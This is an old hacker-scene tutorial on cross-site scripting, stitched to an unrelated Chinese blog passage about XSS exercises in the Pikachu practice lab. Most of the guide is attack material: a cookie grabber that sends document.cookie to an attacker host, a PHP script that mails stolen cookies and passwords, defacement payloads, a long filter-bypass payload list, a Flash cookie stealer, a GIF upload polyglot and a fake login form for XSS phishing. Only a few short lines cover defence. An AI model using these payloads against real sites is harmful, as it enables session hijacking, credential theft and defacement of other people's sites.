Cross Site Scripting - Attack and Defense guide

 
                                                                           ____
                                                                             /   /
 ________________________________________________________________________/   /
|                                                                       /   /
|           Cross Site Scripting - Attack and Defense guide            /   /
|_____________________________________________________________________/   /
                                                                     /   /
                                             By Xylitol 10-02-08    /___/


	Author: Xylitol

	Description: a simple guide on XSS methods.

	Homepage: http://xylitol.free.fr

	Contact: Xylitol[at]fbi[dot]gov

	Date: 10/02/08


	Summary:
		1>  What is XSS ?
		2>  Code a XSS vulnerability
		3>  Make a cookie grabber
		4>  Securing XSS
		5>  Deface Methods
		6>  Filteration Bypassing
		7>  Flash attak
		8>  XSS upload
		9>  phishing XSS


         ____                                   ____
        /   /                                   /   /
 ______/   /_____________________________________/   /______
|     /   /                                       /   /     |
|    /   /.:      Chapter 1 - What is XSS ?      :./   /    |
|___/   /___________________________________________/   /___|
   /   /   (From Wikipedia, the free encyclopedia)   /   /
  /___/                                               /___/



Cross-zone scripting is a browser exploit taking
advantage of a vulnerability within a zone-based security solution.
The attack allows content (scripts) in unprivileged zones
to be executed with the permissions of a privileged zone - i.e.
a privilege escalation within the client (web browser) executing the script.
The vulnerability could be:

    * a web browser bug which under some conditions allows content (scripts)
in one zone to be executed with the permissions of a higher privileged zone.

    * a web browser configuration error; unsafe sites listed in privileged zones.

    * a cross-site scripting vulnerability within a privileged zone

A common attack scenario involves two steps.
The first step is to use a Cross Zone Scripting vulnerability
to get scripts executed within a privileged zone. To complete the attack,
then perform malicious actions on the computer using insecure ActiveX components.

This type of vulnerability has been exploited to silently install
various malware (such as spyware, remote control software, worms and such)
onto computers browsing a malicious web page.

                                        


         ____                                   ____
        /   /                                   /   /
 ______/   /_____________________________________/   /______
|     /   /                                       /   /     |
|    /   /.:Chapter 2 - Code a XSS vulnerability :./   /    |
|___/   /___________________________________________/   /___|
   /   /                                             /   /
  /___/                                               /___/



Open notepad and copy/past this script:


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1" />

<style type="text/css">
<!--
body,td,th {
	color: #FFFFFF;
}
body {
	background-color: #000000;
}
-->
</style><title>Simple XSS vulnerability by Xylitol</title>
<body>
<form action="XSS.php" method="post">
<p align="center"><strong>Simple XSS vulnerability by Xylitol </strong></p>
<div align="center">
  <table width="270" border="0">
    <tr>
      <td width="106"><strong>Search:</strong></td>
        <td width="154"><input name="Vulnerability" type="text" id="Vulnerability" /></td>
      </tr>
  </table>
  <table width="268" border="0">
    <tr>
      <td width="262"><div align="center">
        <input name="submit" type="submit" value="     Search it !     " />
      </div></td>
      </tr>
  </table>
  </div>
</form>
</body>
</html>




after, save this page: index.html
open a new notpad and Copy/past that:


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1" />
<title>Search result:</title>
<style type="text/css">
<!--
body,td,th {
	color: #FFFFFF;
}
body {
	background-color: #000000;
}
-->
</style></head>
<body>
<span class="alerte">Search result  :</span>&nbsp;<strong><?php echo $_POST['Vulnerability']; ?></strong>&nbsp;
</body>
</html>

save this page in: XSS.php
close notepad

open index.html in firefox
enter a value and search
return on the page of research and enter  <script>alert('XSS')</script>
send the form
bingo a dialogue box !

 _______________________________________
/  http://127.0.0.1 dit:              X /
|________________________________________|
|                                        |
|                                        |
|    ^                                   |
|   / /                                  |
|  / | /      XSS                        |
| /  .  /                                |
| -------                                |
|                       ______           |
|                      |  OK  |          |
|                       ------           |
|________________________________________|
            XSS Vulnerability is here...





         ____                                  ____
        /   /                                  /   /
 ______/   /____________________________________/   /______
|     /   /                                      /   /     |
|    /   /.: Chapter 3 - Make a cookie grabbers :./   /    |
|___/   /__________________________________________/   /___|
   /   /                                            /   /
  /___/                                              /___/



insert this script in a vulnerable page (for exemple a guestbook)

<script>
window.open("http://www.Hax0r.com/cookie.php?cookies="+document.cookie);
</script>


(www.Hax0r.com = your site)
Open notepad and make a page: cookie.php
copy/past this code:


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1" />
<title>Error</title>
<style type="text/css">
<!--
body,td,th {
	color: #FFFFFF;
}
body {
	background-color: #000000;
}
-->
</style></head>
<? mail('email@example.com', 'Cookie stealed ! - thx xyli :)', $cookies); ?> 
<body>
<h2><strong>Error</strong> - <strong>Access denied</strong> for <? echo $_SERVER["REMOTE_ADDR"]; ?></h2>
</body>
</html>


It is not enough any more but for the pirate,
than to await the reception of the email and to read the cookie there.



         ____                                 ____
        /   /                                 /   /
 ______/   /___________________________________/   /______
|     /   /                                     /   /     |
|    /   /.:      Chapter 4 - Securing XSS     :./   /    |
|___/   /_________________________________________/   /___|
   /   /                                           /   /
  /___/                                             /___/


FIX it:
for fix XSS Vulnerability use htmlentities:


in line 16 Remplace:
<body>
<span class="alerte">Search result  :</span>&nbsp;<strong><?php echo $_POST['Vulnerability']; ?></strong>&nbsp;
</body>

By:

<body>
<span class="alerte">Search result  :</span>&nbsp;<strong><?php
if(isset($_POST['Vulnerability'])) { echo htmlentities($_POST['Vulnerability']); } ?></strong>&nbsp;
</body>


use htmlspecialchars() function in PHP ;)

other function:
htmlentities() quotes
strip_tags()
...

         ____                                 ____
        /   /                                 /   /
 ______/   /___________________________________/   /______
|     /   /                                     /   /     |
|    /   /.:     Chapter 5 -deface Methods     :./   /    |
|___/   /_________________________________________/   /___|
   /   /                                           /   /
  /___/                                             /___/


defacer with a XSS and a rather simple thing
here are the principal ones…

defacement by an image:
<IMG SRC="http://hax0r.com/Haxored.png">

or a video flash:
<EMBED SRC="http://hax0r.com/Haxored.swf"


more knew: the redirection:
<script>window.open( "http://www.hax0r.com/Haxored.html" )</script>

also see:
<meta http-equiv="refresh" content="0; url=http://hax0r.com/Haxored.html" />




         ____                                 ____
        /   /                                 /   /
 ______/   /___________________________________/   /______
|     /   /                                     /   /     |
|    /   /.: Chapter 6 - Filteration Bypassing :./   /    |
|___/   /_________________________________________/   /___|
   /   /                                           /   /
  /___/                                             /___/


actually it's not that easy to bypass htmlspecialchars()
here some other example of xss Bypass:

<META HTTP-EQUIV=/"refresh/" CONTENT=/"0;
URL=http://;URL=javascript:alert('XSS');/">

<META HTTP-EQUIV=/"refresh/"
CONTENT=/"0;url=javascript:alert('XSS');/">

'">><marquee><h1>XSS</h1></marquee>

'">><script>alert('XSS')</script>

'>><marquee><h1>XSS</h1></marquee>

"><script alert(String.fromCharCode(88,83,83))</script>

<iframe<?php echo chr(11)?> οnlοad=alert('XSS')></iframe>

<div
style="x:expression((window.r==1)?'':eval('r=1;alert(String.fromCharCo
de(88,83,83));'))">

window.alert("Xyli !");

"/></a></><img src=1.gif οnerrοr=alert(1)>

[color=red' οnmοuseοver="alert('xss')"]mouse over[/color]

<body onLoad="alert('XSS');"

<body οnunlοad="javascript:alert('XSS');">

[url=javascript:alert('XSS');]click me[/url]

<script language="JavaScript">alert('XSS')</script>

<img src="javascript:alert('XSS')">

'); alert('XSS

<font style='color:expression(alert(document.cookie))'>

<IMG DYNSRC=/"javascript:alert('XSS')/">

<IMG LOWSRC=/"javascript:alert('XSS')/">

</textarea><script>alert(/xss/)</script>

</title><script>alert(/xss/)</script>

<script src=http://yoursite.com/your_files.js></script>

"><script>alert(0)</script>

<IMG SRC=javascript:alert(String.fromCharCode(88,83,83))>

<IMG SRC=/"jav&#x0D;ascript:alert('XSS');/">

<IMG SRC=/"jav&#x0A;ascript:alert('XSS');/">

<IMG SRC=/"jav&#x09;ascript:alert('XSS');/">

<marquee><script>alert('XSS')</script></marquee>

<? echo('<scr)';
echo('ipt>alert(/"XSS/")</script>'); ?>

<IMG SRC=/"jav&#x0A;ascript:alert('XSS');/">

<IMG SRC=/"jav&#x09;ascript:alert('XSS');/">

<marquee><script>alert('XSS')</script></marquee>

<style>@im/port'/ja/vasc/ript:alert(/"XSS/")';</style>

<img src=foo.png οnerrοr=alert(/xssed/) />

<script>alert(String.fromCharCode(88,83,83))</script>

<scr<script>ipt>alert('XSS');</scr</script>ipt>

<script>location.href="http://www.evilsite.org/cookiegrabber.php?cookie="+
escape(document.cookie)</script>

<script src="http://www.evilsite.org/cookiegrabber.php"></script>

<script>alert('XSS');</script>

<script>alert(1);</script>


Here and there is of it full with others
google is your friends
         ____                                 ____
        /   /                                 /   /
 ______/   /___________________________________/   /______
|     /   /                                     /   /     |
|    /   /.:     Chapter 7 - Flash attack      :./   /    |
|___/   /_________________________________________/   /___|
   /   /                                           /   /
  /___/                                             /___/

Flash is used for complex animations, simulations,
*creation of games etc..
What’s interesting for us is the getURL() action.
This function allows us to redirect the end user to another page.
its syntax is built as follows:
getURL(url:String, [window: String,[method:String]])
exemple:
getURL("http://victime.com/login.php?logout=true","_self");


url: indicate the URL of the site
window: specify within which framework the request must take place (_self, _blank…)
method: method of request GET or POST (by defect GET)


here the handling of the actionscript and the Javascript to post a alert:
getURL("javascript:alert('XSS'");



in 2002 one will show the danger of this facility,
one could for example post the cookie of visitors in this manner:
getURL("javascript:alert(document.cookie)")

in December 2005, a new alternative and appeared
consisting has to benefit from a nonpermanent fault XSS
and possibility of putting a file flash in its signature to give a permanent XSS,
moreover the author of this alternative used this technique in order
to infect MySpace with a deviated worms xss of Samy: Samy Reloaded

cookie stealer in flash ?
not but there is technique to do it
exemple
in a flash file:
GetURL("http://www.victime.com/page.php?var=<script src='http://www.hax0r.com/Haxored.js'></script>","_self");

and in Haxored.js:
document.location="http://hax0r.com/cookiestealer.php?cookie="+document.cookie;


For secure it simple solution: do not allow flash files in your web app


         ____                                    ____
        /   /                                    /   /
 ______/   /______________________________________/   /______
|     /   /                                        /   /     |
|    /   /.:       Chapter 8 - XSS upload         :./   /    |
|___/   /____________________________________________/   /___|
   /   /                                              /   /
  /___/                                                /___/

Make Haxored.gif in paint for exemple
after open Haxored.GIF in notepad
delete all line and insert this:
GIF89a<script>alert("XSS")</script>

save and close it
upload Haxored.gif in a free image hoster look your image
and XSS is here...
dont take Mozillia Firefox for look your image but Mozillia dont run your alert
use Internet explorer

Why add GIF89a ?
well some upload like this one, check that the 'GIF89a' code
is contained in the image as in any .GIF respective.
the vulnerability of this upload results from the checking 'GIF89a' code
for confirmation but of nothing the possible malicious codes contained in this image.
GIF89a<script src="http://hax0r.com/cookiegrabber.php"></script>

to know the code for another image format,
it is just enough to open an image jpg or other with a text editor,
for example a png file: ‰PNG

PNG = ‰PNG
GIF = GIF89a
JPG = ÿØÿà JFIF
BMP = BMFÖ


For secure it dont check getimagesize() only



         ____                                    ____
        /   /                                    /   /
 ______/   /______________________________________/   /______
|     /   /                                        /   /     |
|    /   /.:       Chapter 9 - Phishing XSS       :./   /    |
|___/   /____________________________________________/   /___|
   /   /                                              /   /
  /___/                                                /___/

you understood the goal of the phishing ?
and XSS ?

in our example it will be necessary to find a Vulnerable site to the XSS
and to inject there oneself in a form to oneself directly in the URL the following code:


<p>Enter your login and password, thank:</p>
<form action="http://hax0r.com/mail.php">
<table><tr><td>Login:</td><td><input type=text length=20 name=login>
</td></tr><tr><td>Password:</td><td>
<input type=text length=20 name=password>
</td></tr></table><input type=submit value=          OK          >
</form>




you will have it to guess script will simulate a form of connextion and send the value to you
example of file php for  sending this email (mail.php):



<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1" />
<title>Error</title>
<style type="text/css">
<!--
body,td,th {
	color: #FFFFFF;
}
body {
	background-color: #000000;
}
-->
</style></head>
<?php
$login = $HTTP_GET_VARS["login"];
$password = $HTTP_GET_VARS["password"];
mail("email@example.com", "Cookie stealed ! - thx xyli :)", $password , $login );
?> 
<body>
<h2><strong>Error</strong> -<strong> Server too much busy</strong></h2>
</body>
</html>




the user will believe that the waiter and overloads some and will not suspect nothing
I think that you understood this principle ?




         ____                                    ____
        /   /                                    /   /
 ______/   /______________________________________/   /______
|     /   /                                        /   /     |
|    /   /.: Xylitol respects and hello's fly out :./   /    |
|___/   /____________________________________________/   /___|
   /   /                                              /   /
  /___/                                                /___/

nexus, Langy, Uber0n, FullFreeez, RePliKaN!, bl00d, c0de91, Xonzai
Agent-D, Agent-Z, Vamp, Xspider, Mitnick, Honnox, Blwood, str0ke

and all hardworking sceners in the scene !

 _________________________________
|                                 |
| .: Xylitol thanks this sites :. |
|_________________________________|

http://www.googlebig.com/
http://xssed.com/
http://www.xssing.com/
http://www.milw0rm.com/
http://H4cky0u.org/


If you want to contact me for any stupid reason,
drop me an MSN or WLM only: Xylitol[at]fbi[dot]gov
____
/   / 
 /   /_____________________________________________________________________________
  /   /                                                                            |
   /   /             Cross Site Scripting - Attack and Defense guide               |
    /   /__________________________________________________________________________|
     /   / 
      /___/  By Xylitol 10-02-08

### 关于 Pikachu 项目中的 XSS 漏洞 #### 跨站脚本攻击(XSS) 跨站脚本攻击是一种常见的安全漏洞,允许攻击者通过注入恶意脚本来执行未经授权的操作。这种攻击通常发生在 Web 应用程序未能正确验证或转义用户输入的情况下。 在 Pikachu 项目的上下文中,存在多个演示场景来展示 XSS 的工作原理及其潜在危害[^1]。 #### 登录页面的 XSS 风险 受害者可以通过访问 `http://127.0.0.1/pikachu/vul/xss/xsspost/post_login.php` 页面并使用默认凭证 (`test/abc123`) 进行登录操作。此页面可能未对用户的输入进行充分过滤,从而导致反射型或存储型 XSS 攻击的发生。 #### 利用图片标签触发 XSS 另一个典型的例子涉及 `<img>` 标签的滥用。例如,在某些情况下,可以利用如下 HTML 片段发起请求到指定服务器以窃取会话信息或其他敏感数据: ```html <img src="http://127.0.0.1/pikachu/pkxss/xfish/fish.php" /> ``` 上述代码片段展示了如何通过图像加载机制实现远程通信的目的[^2]。 #### 大小写绕过的技巧 为了测试应用程序的安全防护措施是否存在缺陷,研究者们经常尝试不同的方法规避检测规则。比如下面这个案例就说明了即使简单的字符转换也可能突破初步防御屏障: ```html <SCRIPT>alert(/xss/)</sCRIpt> ``` 这里故意改变了部分字母的大写形式试图迷惑模式匹配算法达到成功弹窗的效果[^3]。 #### 嵌套 script 标记造成破坏 更进一步地考虑实际应用环境下的复杂情况,则有这样一种构造方式能够有效避开一些基础级别的HTML净化处理逻辑: ```html </script><script> alert('xss')</script> ``` 它巧妙地关闭当前正在解析状态中的 JavaScript 区域然后再开启新的定义区域以便执行自定义命令序列[^4]。 ### 结论 综上所述,Pikachu 提供了一个很好的平台让我们深入理解各种类型的Web安全性议题,特别是针对像XSS这样的经典威胁进行了详尽的实际演练.
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值